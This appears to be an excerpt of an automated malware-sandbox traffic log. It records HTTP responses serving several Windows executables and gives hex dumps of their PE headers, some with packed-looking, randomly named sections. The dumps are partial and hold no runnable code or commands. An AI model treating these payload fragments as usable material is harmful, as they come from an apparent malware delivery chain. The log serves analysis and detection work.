00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 05 Dec 2024 06:33:45 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "94750-5e7e950876500"Accept-Ranges: bytesContent-Length: 608080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 05 Dec 2024 06:33:46 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "6dde8-5e7e950876500"Accept-Ranges: bytesContent-Length: 450024Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 05 Dec 2024 06:33:47 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "1f3950-5e7e950876500"Accept-Ranges: bytesContent-Length: 2046288Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 05 Dec 2024 06:33:51 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "3ef50-5e7e950876500"Accept-Ranges: bytesContent-Length: 257872Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 05 Dec 2024 06:33:52 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "13bf0-5e7e950876500"Accept-Ranges: bytesContent-Length: 80880Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 05 Dec 2024 06:33:57 GMTContent-Type: application/octet-streamContent-Length: 3250176Last-Modified: Thu, 05 Dec 2024 06:18:33 GMTConnection: keep-aliveETag: "675145b9-319800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 98 01 00 00 00 00 00 00 a0 31 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 d0 31 00 00 04 00 00 18 23 32 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 88 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 8a 31 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a8 8a 31 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 80 06 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 88 03 00 00 00 90 06 00 00 04 00 00 00 90 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 94 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 72 7a 68 72 78 6f 6c 64 00 e0 2a 00 00 b0 06 00 00 dc 2a 00 00 96 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 75 79 66 6d 6f 75 74 69 00 10 00 00 00 90 31 00 00 04 00 00 00 72 31 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 a0 31 00 00 22 00 00 00 76 31 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 05 Dec 2024 06:34:21 GMTContent-Type: application/octet-streamContent-Length: 1840640Last-Modified: Thu, 05 Dec 2024 01:48:39 GMTConnection: keep-aliveETag: "67510677-1c1600"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 8b ee 4c 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 90 03 00 00 b8 00 00 00 00 00 00 00 00 49 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 30 49 00 00 04 00 00 68 2a 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5c f0 04 00 70 00 00 00 00 e0 04 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 f1 04 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 d0 04 00 00 10 00 00 00 1e 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 b0 02 00 00 00 e0 04 00 00 02 00 00 00 2e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 f0 04 00 00 02 00 00 00 30 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 30 2a 00 00 00 05 00 00 02 00 00 00 32 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 62 69 6c 79 78 7a 75 66 00 c0 19 00 00 30 2f 00 00 ba 19 00 00 34 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6d 68 6d 6d 63 61 72 6f 00 10 00 00 00 f0 48 00 00 06 00 00 00 ee 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 00 49 00 00 22 00 00 00 f4 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 